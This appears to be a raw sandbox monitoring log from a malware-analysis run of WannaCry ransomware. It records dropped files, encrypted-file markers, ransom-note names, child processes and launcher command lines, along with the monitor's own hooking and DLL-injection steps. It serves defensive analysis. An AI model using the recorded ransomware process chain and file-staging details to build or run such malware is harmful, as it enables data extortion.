2025-12-08 09:08:39,312 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:08:39,312 [root] DEBUG: 288: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:08:39,328 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:08:39,328 [root] DEBUG: 288: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:08:39,328 [root] INFO: Added new file to list with pid None and path C:\ba69bdf0a250e352360c33\1025\@WanaDecryptor@.exe
2025-12-08 09:08:39,328 [root] DEBUG: 288: Hooked 611 out of 613 functions
2025-12-08 09:08:39,328 [root] DEBUG: 288: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:08:39,343 [root] DEBUG: 288: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x130000
2025-12-08 09:08:39,343 [root] INFO: Added new file to list with pid None and path C:\ba69bdf0a250e352360c33\1028\~SD7566.tmp
2025-12-08 09:08:39,343 [root] INFO: Loaded monitor into process with pid 288
2025-12-08 09:08:39,343 [root] DEBUG: 288: caller_dispatch: Added region at 0x00CE0000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x00CE2FD3, thread 2284).
2025-12-08 09:08:39,343 [root] DEBUG: 288: YaraScan: Scanning 0x00CE0000, size 0x21208
2025-12-08 09:08:39,359 [root] DEBUG: 288: ProcessImageBase: Main module image at 0x00CE0000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:08:39,359 [root] DEBUG: 288: DLL loaded at 0x74AC0000: C:\Windows\system32\uxtheme (0x80000 bytes).
2025-12-08 09:08:39,359 [root] INFO: Added new file to list with pid None and path C:\ba69bdf0a250e352360c33\1028\eula.rtf.WNCRYT
2025-12-08 09:08:39,390 [root] INFO: Added new file to list with pid None and path C:\ba69bdf0a250e352360c33\1028\@Please_Read_Me@.txt
2025-12-08 09:08:39,390 [root] DEBUG: 3040: Dropped file limit reached.
2025-12-08 09:08:39,390 [root] DEBUG: 288: DLL loaded at 0x74560000: C:\Windows\SysWOW64\SXS (0x5f000 bytes).
2025-12-08 09:08:39,406 [root] DEBUG: 288: DLL loaded at 0x74240000: C:\Windows\SysWOW64\dwmapi (0x13000 bytes).
2025-12-08 09:08:39,421 [root] DEBUG: 288: DLL loaded at 0x756F0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2025-12-08 09:08:39,437 [root] DEBUG: 288: DLL loaded at 0x741C0000: C:\Windows\SysWOW64\vbscript (0x7d000 bytes).
2025-12-08 09:08:39,437 [root] DEBUG: 288: DLL loaded at 0x76080000: C:\Windows\syswow64\WINTRUST (0x2f000 bytes).
2025-12-08 09:08:39,437 [root] DEBUG: 288: DLL loaded at 0x73140000: C:\Windows\SysWOW64\CRYPTSP (0x17000 bytes).
2025-12-08 09:08:39,453 [root] DEBUG: 288: DLL loaded at 0x73100000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 09:08:39,468 [root] DEBUG: 288: DLL loaded at 0x74670000: C:\Windows\SysWOW64\MSISIP (0x8000 bytes).
2025-12-08 09:08:39,468 [root] DEBUG: 288: DLL loaded at 0x741A0000: C:\Windows\SysWOW64\wshext (0x16000 bytes).
2025-12-08 09:08:39,500 [root] DEBUG: 288: DLL loaded at 0x74110000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32 (0x84000 bytes).
2025-12-08 09:08:39,500 [root] DEBUG: 288: DLL loaded at 0x76640000: C:\Windows\syswow64\SHELL32 (0xc4c000 bytes).
2025-12-08 09:08:39,515 [root] DEBUG: 288: DLL loaded at 0x740E0000: C:\Windows\SysWOW64\scrobj (0x2d000 bytes).
2025-12-08 09:08:39,515 [root] DEBUG: 288: DLL loaded at 0x740B0000: C:\Windows\SysWOW64\wshom.ocx (0x21000 bytes).
2025-12-08 09:08:39,546 [root] DEBUG: 288: DLL loaded at 0x74090000: C:\Windows\SysWOW64\MPR (0x12000 bytes).
2025-12-08 09:08:39,546 [root] DEBUG: 288: DLL loaded at 0x74060000: C:\Windows\SysWOW64\ScrRun (0x2a000 bytes).
2025-12-08 09:08:39,562 [root] DEBUG: 288: DLL loaded at 0x73F60000: C:\Windows\system32\propsys (0xf5000 bytes).
2025-12-08 09:08:39,625 [root] DEBUG: 288: DLL loaded at 0x745C0000: C:\Windows\SysWOW64\ntmarta (0x21000 bytes).
2025-12-08 09:08:39,640 [root] DEBUG: 288: DLL loaded at 0x765E0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2025-12-08 09:08:39,640 [root] DEBUG: 288: DLL loaded at 0x73DC0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32 (0x19e000 bytes).
2025-12-08 09:08:39,656 [root] DEBUG: 288: DLL loaded at 0x75AC0000: C:\Windows\syswow64\profapi (0xb000 bytes).
2025-12-08 09:08:39,687 [root] DEBUG: 288: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 09:08:39,687 [root] DEBUG: 288: DLL loaded at 0x75780000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2025-12-08 09:08:39,703 [root] DEBUG: 288: DLL loaded at 0x76590000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2025-12-08 09:08:39,718 [root] DEBUG: 288: DLL loaded at 0x774F0000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2025-12-08 09:08:39,750 [root] DEBUG: 288: api-rate-cap: RegQueryValueExW hook disabled due to rate
2025-12-08 09:08:39,796 [root] DEBUG: 288: api-rate-cap: NtQueryValueKey hook disabled due to rate
2025-12-08 09:08:39,828 [root] DEBUG: 288: api-rate-cap: NtQueryValueKey hook disabled due to rate
2025-12-08 09:08:39,875 [root] DEBUG: 288: DLL loaded at 0x73910000: C:\Windows\SysWOW64\apphelp (0x4c000 bytes).
2025-12-08 09:08:39,875 [root] DEBUG: 288: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 09:08:39,890 [root] DEBUG: 288: api-rate-cap: FindNextFileW hook disabled due to rate
2025-12-08 09:08:39,921 [root] DEBUG: 288: DLL loaded at 0x73D60000: C:\Windows\System32\shdocvw (0x2f000 bytes).
2025-12-08 09:08:39,937 [root] DEBUG: 288: DLL loaded at 0x74550000: C:\Windows\SysWOW64\LINKINFO (0x9000 bytes).
2025-12-08 09:08:39,968 [root] DEBUG: 288: DLL loaded at 0x73CF0000: C:\Windows\SysWOW64\ntshrui (0x70000 bytes).
2025-12-08 09:08:39,968 [root] DEBUG: 288: DLL loaded at 0x73DA0000: C:\Windows\SysWOW64\srvcli (0x19000 bytes).
2025-12-08 09:08:39,984 [root] DEBUG: 288: DLL loaded at 0x73D90000: C:\Windows\SysWOW64\cscapi (0xb000 bytes).
2025-12-08 09:08:40,015 [root] DEBUG: 288: DLL loaded at 0x73CE0000: C:\Windows\SysWOW64\slc (0xa000 bytes).
2025-12-08 09:08:40,046 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe.lnk
2025-12-08 09:08:40,046 [root] DEBUG: Error 5 (0x5) - OpenProcessHandler: Error obtaining target process name: Access is denied.
2025-12-08 09:08:40,046 [root] DEBUG: 288: OpenProcessHandler: Injection info created for process 1212, handle 0x318: Error obtaining target process name
2025-12-08 09:08:40,062 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1212
2025-12-08 09:08:40,062 [lib.api.process] INFO: Monitor config for <Process 1212 explorer.exe>: C:\tmp2azv04x4\dll\1212.ini
2025-12-08 09:08:40,062 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2azv04x4\dll\YZitKGI.dll, loader C:\tmp2azv04x4\bin\kTlnsNzT.exe
2025-12-08 09:08:40,234 [root] DEBUG: Loader: Injecting process 1212 with C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:08:40,249 [root] DEBUG: 1212: Python path set to 'C:\Python38'.
2025-12-08 09:08:40,249 [root] DEBUG: 1212: Dropped file limit defaulting to 100.
2025-12-08 09:08:40,249 [root] INFO: Disabling sleep skipping.
2025-12-08 09:08:40,265 [root] DEBUG: 1212: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:08:40,281 [root] DEBUG: 1212: YaraScan: Scanning 0x00000000FF550000, size 0x318662
2025-12-08 09:08:40,296 [root] DEBUG: 1212: Monitor initialised: 64-bit capemon loaded in process 1212 at 0x000007FEF30B0000, thread 2564, image base 0x00000000FF550000, stack from 0x00000000061B2000-0x00000000061C0000
2025-12-08 09:08:40,296 [root] DEBUG: 1212: Commandline: C:\Windows\Explorer.EXE
2025-12-08 09:08:40,312 [root] DEBUG: 1212: GetAddressByYara: ModuleBase 0x0000000077760000 FunctionName LdrpCallInitRoutine
2025-12-08 09:08:40,328 [root] WARNING: b'Unable to place hook on LockResource'
2025-12-08 09:08:40,328 [root] DEBUG: 1212: set_hooks: Unable to hook LockResource
2025-12-08 09:08:40,343 [root] DEBUG: 1212: Hooked 605 out of 606 functions
2025-12-08 09:08:40,390 [root] INFO: Loaded monitor into process with pid 1212
2025-12-08 09:08:40,406 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-08 09:08:40,468 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:08:40,468 [root] DEBUG: 1212: caller_dispatch: Added region at 0x00000000FF550000 to tracked regions list (msvcrt::memcpy returns to 0x00000000FF5709F1, thread 1216).
2025-12-08 09:08:40,468 [lib.api.process] INFO: Injected into 64-bit <Process 1212 explorer.exe>
2025-12-08 09:08:40,468 [root] DEBUG: 1212: YaraScan: Scanning 0x00000000FF550000, size 0x318662
2025-12-08 09:08:40,484 [root] DEBUG: 1212: ProcessImageBase: Main module image at 0x00000000FF550000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:08:40,500 [root] DEBUG: 288: NtTerminateProcess hook: Attempting to dump process 288
2025-12-08 09:08:40,500 [root] DEBUG: 288: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:08:40,500 [root] DEBUG: 288: DLL loaded at 0x74230000: C:\Windows\SysWOW64\netutils (0x9000 bytes).
2025-12-08 09:08:40,500 [root] INFO: Process with pid 288 has terminated
2025-12-08 09:08:40,515 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\m.vbs to files\8ad4ee4a55e7cb95cf50447ce04da40414720cb791a7d3762cab17d28b36e91c; Size is 217; Max size: 100000000
2025-12-08 09:08:40,531 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\275781765172918.bat to files\e837d03c6f619b688952bd1a6251c780db7d7135fb3656b9a55a3d0d37b1c056; Size is 338; Max size: 100000000
2025-12-08 09:08:40,531 [root] DEBUG: 268: NtTerminateProcess hook: Attempting to dump process 268
2025-12-08 09:08:40,546 [root] DEBUG: 268: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:08:40,546 [root] INFO: Process with pid 268 has terminated
2025-12-08 09:08:50,984 [root] DEBUG: 1212: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 09:08:52,062 [root] DEBUG: 1212: api-rate-cap: SHGetKnownFolderPath hook disabled due to rate
2025-12-08 09:08:58,218 [root] DEBUG: 1212: api-rate-cap: RegQueryValueExW hook disabled due to rate
2025-12-08 09:09:01,875 [root] DEBUG: 3040: api-cap: memcpy hook disabled due to count: 5000
2025-12-08 09:09:08,812 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 1008: C:\Users\user\AppData\Local\Temp\taskdl.exe, ImageBase: 0x00400000
2025-12-08 09:09:08,828 [root] INFO: Announced 32-bit process name: taskdl.exe pid: 1008
2025-12-08 09:09:08,828 [lib.api.process] INFO: Monitor config for <Process 1008 taskdl.exe>: C:\tmp2azv04x4\dll\1008.ini
2025-12-08 09:09:08,843 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:08,921 [root] DEBUG: Loader: Injecting process 1008 (thread 1040) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:08,953 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:09:08,953 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:08,953 [lib.api.process] INFO: Injected into 32-bit <Process 1008 taskdl.exe>
2025-12-08 09:09:08,968 [root] INFO: Announced 32-bit process name: taskdl.exe pid: 1008
2025-12-08 09:09:08,984 [lib.api.process] INFO: Monitor config for <Process 1008 taskdl.exe>: C:\tmp2azv04x4\dll\1008.ini
2025-12-08 09:09:08,984 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:09,046 [root] DEBUG: Loader: Injecting process 1008 (thread 1040) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:09,062 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:09:09,062 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:09,078 [lib.api.process] INFO: Injected into 32-bit <Process 1008 taskdl.exe>
2025-12-08 09:09:09,125 [root] DEBUG: 1008: Python path set to 'C:\Python38'.
2025-12-08 09:09:09,140 [root] DEBUG: 1008: Dropped file limit defaulting to 100.
2025-12-08 09:09:09,140 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:09,156 [root] DEBUG: 1008: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:09,156 [root] DEBUG: 1008: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:09:09,187 [root] DEBUG: 1008: Monitor initialised: 32-bit capemon loaded in process 1008 at 0x74260000, thread 1040, image base 0x400000, stack from 0x186000-0x190000
2025-12-08 09:09:09,203 [root] DEBUG: 1008: Commandline: taskdl.exe
2025-12-08 09:09:09,234 [root] DEBUG: 1008: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:09,234 [root] DEBUG: 1008: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:09:09,265 [root] DEBUG: 1008: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:09:09,265 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:09:09,281 [root] DEBUG: 1008: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:09:09,281 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:09:09,312 [root] DEBUG: 1008: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:09:09,328 [root] DEBUG: 1008: Hooked 611 out of 613 functions
2025-12-08 09:09:09,328 [root] DEBUG: 1008: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:09:09,328 [root] DEBUG: 1008: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x200000
2025-12-08 09:09:09,343 [root] INFO: Loaded monitor into process with pid 1008
2025-12-08 09:09:09,343 [root] DEBUG: 1008: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x004019B1, thread 1040).
2025-12-08 09:09:09,359 [root] DEBUG: 1008: caller_dispatch: Scanning calling region at 0x00400000...
2025-12-08 09:09:09,359 [root] DEBUG: 1008: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:09:09,375 [root] DEBUG: 1008: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:09:09,390 [root] DEBUG: 1008: NtTerminateProcess hook: Attempting to dump process 1008
2025-12-08 09:09:09,437 [root] DEBUG: 1008: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:09:09,437 [root] INFO: Process with pid 1008 has terminated
2025-12-08 09:09:16,593 [root] DEBUG: 3040: api-cap: FindNextFileW hook disabled due to count: 5000
2025-12-08 09:09:25,656 [root] DEBUG: 1212: api-rate-cap: NtQueryValueKey hook disabled due to rate
2025-12-08 09:09:34,406 [root] DEBUG: 3040: api-cap: NtClose hook disabled due to count: 5000
2025-12-08 09:09:36,687 [root] DEBUG: 3040: DLL loaded at 0x74AC0000: C:\Windows\system32\uxtheme (0x80000 bytes).
2025-12-08 09:09:36,687 [root] DEBUG: 3040: DLL loaded at 0x722E0000: C:\Windows\system32\IconCodecService (0x6000 bytes).
2025-12-08 09:09:36,703 [root] DEBUG: 3040: DLL loaded at 0x721A0000: C:\Windows\system32\WindowsCodecs (0x131000 bytes).
2025-12-08 09:09:36,703 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 1740: C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe, ImageBase: 0x00400000
2025-12-08 09:09:36,718 [root] INFO: Announced 32-bit process name: @WanaDecryptor@.exe pid: 1740
2025-12-08 09:09:36,718 [lib.api.process] INFO: Monitor config for <Process 1740 @WanaDecryptor@.exe>: C:\tmp2azv04x4\dll\1740.ini
2025-12-08 09:09:36,718 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:36,750 [root] DEBUG: Loader: Injecting process 1740 (thread 2328) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:36,750 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:09:36,750 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:36,750 [lib.api.process] INFO: Injected into 32-bit <Process 1740 @WanaDecryptor@.exe>
2025-12-08 09:09:36,765 [root] INFO: Announced 32-bit process name: @WanaDecryptor@.exe pid: 1740
2025-12-08 09:09:36,765 [lib.api.process] INFO: Monitor config for <Process 1740 @WanaDecryptor@.exe>: C:\tmp2azv04x4\dll\1740.ini
2025-12-08 09:09:36,765 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:36,812 [root] DEBUG: Loader: Injecting process 1740 (thread 2328) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:36,812 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:09:36,812 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:36,812 [lib.api.process] INFO: Injected into 32-bit <Process 1740 @WanaDecryptor@.exe>
2025-12-08 09:09:36,890 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 2440: C:\Windows\system32\cmd.exe, ImageBase: 0x4A8A0000
2025-12-08 09:09:36,906 [root] DEBUG: 1740: Python path set to 'C:\Python38'.
2025-12-08 09:09:36,906 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2440
2025-12-08 09:09:36,906 [lib.api.process] INFO: Monitor config for <Process 2440 cmd.exe>: C:\tmp2azv04x4\dll\2440.ini
2025-12-08 09:09:36,906 [root] DEBUG: 1740: Dropped file limit defaulting to 100.
2025-12-08 09:09:36,906 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:36,921 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:36,921 [root] DEBUG: Loader: Injecting process 2440 (thread 1972) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:36,937 [root] DEBUG: 1740: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:36,937 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:09:36,937 [root] DEBUG: 1740: YaraScan: Scanning 0x00400000, size 0x3d000
2025-12-08 09:09:36,984 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:36,984 [lib.api.process] INFO: Injected into 32-bit <Process 2440 cmd.exe>
2025-12-08 09:09:36,984 [root] DEBUG: 1740: Monitor initialised: 32-bit capemon loaded in process 1740 at 0x74260000, thread 2328, image base 0x400000, stack from 0x186000-0x190000
2025-12-08 09:09:36,984 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2440
2025-12-08 09:09:36,984 [lib.api.process] INFO: Monitor config for <Process 2440 cmd.exe>: C:\tmp2azv04x4\dll\2440.ini
2025-12-08 09:09:36,984 [root] DEBUG: 1740: Commandline: @WanaDecryptor@.exe co
2025-12-08 09:09:36,984 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:36,984 [root] DEBUG: 1740: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:37,000 [root] DEBUG: 1740: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:09:37,000 [root] DEBUG: 1740: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:09:37,000 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:09:37,000 [root] DEBUG: 1740: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:09:37,000 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:09:37,000 [root] DEBUG: 1740: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:09:37,015 [root] DEBUG: 1740: Hooked 611 out of 613 functions
2025-12-08 09:09:37,015 [root] DEBUG: Loader: Injecting process 2440 (thread 1972) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:37,015 [root] DEBUG: 1740: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:09:37,015 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:09:37,046 [root] DEBUG: 1740: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x300000
2025-12-08 09:09:37,046 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:37,046 [lib.api.process] INFO: Injected into 32-bit <Process 2440 cmd.exe>
2025-12-08 09:09:37,046 [root] INFO: Loaded monitor into process with pid 1740
2025-12-08 09:09:37,062 [root] DEBUG: 1740: DLL loaded at 0x71E10000: C:\Windows\system32\odbcint (0x38000 bytes).
2025-12-08 09:09:37,062 [root] DEBUG: 1740: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x004131BD, thread 2328).
2025-12-08 09:09:37,062 [root] DEBUG: 1740: caller_dispatch: Scanning calling region at 0x00400000...
2025-12-08 09:09:37,078 [root] DEBUG: 1740: YaraScan: Scanning 0x00400000, size 0x3d000
2025-12-08 09:09:37,078 [root] DEBUG: 1740: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:09:37,093 [root] DEBUG: 1740: DLL loaded at 0x71E00000: C:\Windows\system32\RICHED32 (0x6000 bytes).
2025-12-08 09:09:37,093 [root] DEBUG: 2440: Python path set to 'C:\Python38'.
2025-12-08 09:09:37,109 [root] DEBUG: 1740: DLL loaded at 0x71D70000: C:\Windows\system32\RICHED20 (0x76000 bytes).
2025-12-08 09:09:37,109 [root] DEBUG: 2440: Dropped file limit defaulting to 100.
2025-12-08 09:09:37,109 [root] DEBUG: 1740: DLL loaded at 0x74AC0000: C:\Windows\system32\uxtheme (0x80000 bytes).
2025-12-08 09:09:37,125 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:37,125 [root] DEBUG: 1740: DLL loaded at 0x739B0000: C:\Windows\system32\dwmapi (0x13000 bytes).
2025-12-08 09:09:37,140 [root] DEBUG: 2440: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:37,140 [root] DEBUG: 1740: DLL loaded at 0x73390000: C:\Windows\system32\mswsock (0x3c000 bytes).
2025-12-08 09:09:37,140 [root] DEBUG: 2440: YaraScan: Scanning 0x4A8A0000, size 0x4bb2e
2025-12-08 09:09:37,140 [root] DEBUG: 1740: DLL loaded at 0x73380000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2025-12-08 09:09:37,140 [root] DEBUG: 2440: Monitor initialised: 32-bit capemon loaded in process 2440 at 0x74260000, thread 1972, image base 0x4a8a0000, stack from 0x2e3000-0x3e0000
2025-12-08 09:09:37,140 [root] DEBUG: 2440: Commandline: cmd.exe /c start /b @WanaDecryptor@.exe vs
2025-12-08 09:09:37,156 [root] DEBUG: 2440: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:37,156 [root] DEBUG: 2440: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:09:37,156 [root] DEBUG: 2440: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:09:37,156 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:09:37,156 [root] DEBUG: 2440: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:09:37,156 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:09:37,156 [root] DEBUG: 2440: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:09:37,156 [root] DEBUG: 2440: Hooked 611 out of 613 functions
2025-12-08 09:09:37,156 [root] DEBUG: 2440: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:09:37,171 [root] DEBUG: 2440: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x210000
2025-12-08 09:09:37,171 [root] INFO: Loaded monitor into process with pid 2440
2025-12-08 09:09:37,171 [root] DEBUG: 2440: caller_dispatch: Added region at 0x4A8A0000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x4A8A7CBD, thread 1972).
2025-12-08 09:09:37,171 [root] DEBUG: 2440: YaraScan: Scanning 0x4A8A0000, size 0x4bb2e
2025-12-08 09:09:37,171 [root] DEBUG: 2440: ProcessImageBase: Main module image at 0x4A8A0000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:09:37,171 [root] DEBUG: 2440: CreateProcessHandler: Injection info set for new process 2124: C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe, ImageBase: 0x00400000
2025-12-08 09:09:37,171 [root] INFO: Announced 32-bit process name: @WanaDecryptor@.exe pid: 2124
2025-12-08 09:09:37,171 [lib.api.process] INFO: Monitor config for <Process 2124 @WanaDecryptor@.exe>: C:\tmp2azv04x4\dll\2124.ini
2025-12-08 09:09:37,187 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:37,187 [root] DEBUG: Loader: Injecting process 2124 (thread 2596) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:37,187 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:09:37,187 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:37,203 [lib.api.process] INFO: Injected into 32-bit <Process 2124 @WanaDecryptor@.exe>
2025-12-08 09:09:37,203 [root] DEBUG: 2440: DLL loaded at 0x73910000: C:\Windows\system32\apphelp (0x4c000 bytes).
2025-12-08 09:09:37,203 [root] INFO: Announced 32-bit process name: @WanaDecryptor@.exe pid: 2124
2025-12-08 09:09:37,203 [lib.api.process] INFO: Monitor config for <Process 2124 @WanaDecryptor@.exe>: C:\tmp2azv04x4\dll\2124.ini
2025-12-08 09:09:37,203 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:37,218 [root] DEBUG: Loader: Injecting process 2124 (thread 2596) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:37,218 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:09:37,218 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:37,218 [lib.api.process] INFO: Injected into 32-bit <Process 2124 @WanaDecryptor@.exe>
2025-12-08 09:09:37,234 [root] DEBUG: 2124: Python path set to 'C:\Python38'.
